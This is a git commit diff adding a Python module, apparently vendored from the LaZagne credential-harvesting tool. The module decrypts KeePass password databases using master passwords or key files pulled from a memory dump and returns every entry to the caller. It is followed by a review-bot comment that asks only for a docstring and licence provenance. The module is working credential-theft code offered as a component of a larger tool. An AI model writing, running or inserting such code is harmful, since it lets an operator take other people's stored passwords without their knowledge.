author | AL-LCL <alvin@alvinhavel.com> | 2023-05-19 11:01:49 +0200 |
---|---|---|
committer | AL-LCL <alvin@alvinhavel.com> | 2023-05-19 11:01:49 +0200 |
commit | 20dbeb2f38684c65ff0a4b99012c161295708e88 (patch) | |
tree | a5b8445f55da2fbbb92443b68e9d7354a290c598 /foreign/client_handling/lazagne/softwares/memory/keepass.py |
Diffstat (limited to 'foreign/client_handling/lazagne/softwares/memory/keepass.py')
-rw-r--r-- | foreign/client_handling/lazagne/softwares/memory/keepass.py | 31 |
1 files changed, 31 insertions, 0 deletions
diff --git a/foreign/client_handling/lazagne/softwares/memory/keepass.py b/foreign/client_handling/lazagne/softwares/memory/keepass.py
new file mode 100644
index 0000000..4df5b84
--- /dev/null
+++ b/foreign/client_handling/lazagne/softwares/memory/keepass.py
@@ -0,0 +1,31 @@
+# -*- coding: utf-8 -*-
+# Thanks to the awesome work done by harmjoy
+# For more information http://www.harmj0y.net/blog/redteaming/keethief-a-case-study-in-attacking-keepass-part-2/
+
+# Thanks for the great work of libkeepass (used to decrypt keepass file)
+# https://github.com/phpwutz/libkeepass
+
+import traceback
+
+from . import libkeepass
+from foreign.client_handling.lazagne.config.constant import constant
+from foreign.client_handling.lazagne.config.module_info import ModuleInfo
+
+
+class Keepass(ModuleInfo):
+ def __init__(self):
+ ModuleInfo.__init__(self, 'keepass', 'memory')
+
+ def run(self):
+ # password found on the memory dump class
+ if constant.keepass:
+ res = []
+ for db in constant.keepass:
+ try:
+ with libkeepass.open(db.values()[0][u'Database'],
+ password=db.get(u"KcpPassword", {}).get(u'Password'),
+ keyfile=db.get(u"KcpKeyFile", {}).get(u'KeyFilePath')) as kdb:
+ res.extend(kdb.to_dic())
+ except Exception:
+ self.debug(traceback.format_exc())
+ return res
|
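Review bot: `run()` has no docstring, and its only comment ("password found on the memory dump class") says neither what the entries of `constant.keepass` contain nor what is returned. Someone auditing the module has to infer from the `libkeepass.open(...)` call that each entry carries a database path plus `KcpPassword`/`KcpKeyFile` material, and that the output of `kdb.to_dic()` (presumably the decrypted entries) is handed back to the caller. I would add a docstring saying so, e.g. `"""Open each database listed in constant.keepass with the key material recorded there and return the decrypted entries."""`. The file also looks like a copy of third-party code (it sits under `lazagne/` and the header credits KeeThief and libkeepass) with no upstream version or licence recorded; a header line such as `# vendored from <UPSTREAM_REPO>@<COMMIT>` would make the copy auditable against its origin. Indentation is lost in this rendering, so whether `return res` sits inside the `if constant.keepass:` block cannot be checked from here.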